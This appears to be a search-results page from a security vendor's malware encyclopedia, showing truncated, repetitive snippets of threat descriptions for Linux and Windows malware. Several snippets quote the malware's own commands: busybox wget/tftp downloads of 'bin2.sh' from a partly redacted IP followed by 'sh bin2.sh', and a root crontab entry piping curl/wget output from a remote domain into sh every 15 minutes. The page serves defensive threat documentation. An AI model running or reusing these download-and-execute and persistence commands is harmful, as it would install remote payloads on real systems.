Search
Keyword: usojan.sh.malxmr.uwejs
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' cd /tmp/; busybox wget http://{BLOCKED}6.{BLOCKED}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g {BLOCKED}6.{BLOCKED}0.250.37; sh bin2.sh; echo
}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g {BLOCKED}6.{BLOCKED}0.250.37; sh bin2.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' Linux/Agent.AL (ESET) Downloaded from the Internet Executes files
/tmp/; busybox wget http://{BLOCKED}6.{BLOCKED}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g 176.10.250.37; sh bin2.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' Linux/Agent.AL (ESET)
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details
This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It
This Trojan may be unknowingly downloaded by a user while visiting malicious websites. Arrival Details This Trojan may be unknowingly downloaded by a user while visiting malicious websites.
This malware checks if the main executable is executed by root and the file name is "boomsh". If so, it then takes ownership and sets the permission (Read only, Execute Only, Full) to
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It does not have any propagation routine. It does
-fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh Path: /var/spool/cron/root Schedule: Every 15 minutes Command: */15 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q
Arrival Details This malware arrives via the following means: Downloaded by Trojan.SH.BROOTKIT.A Other Details This Rootkit does the following: It is used by Trojan.SH.BROOTKIT.B for its rootkit
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a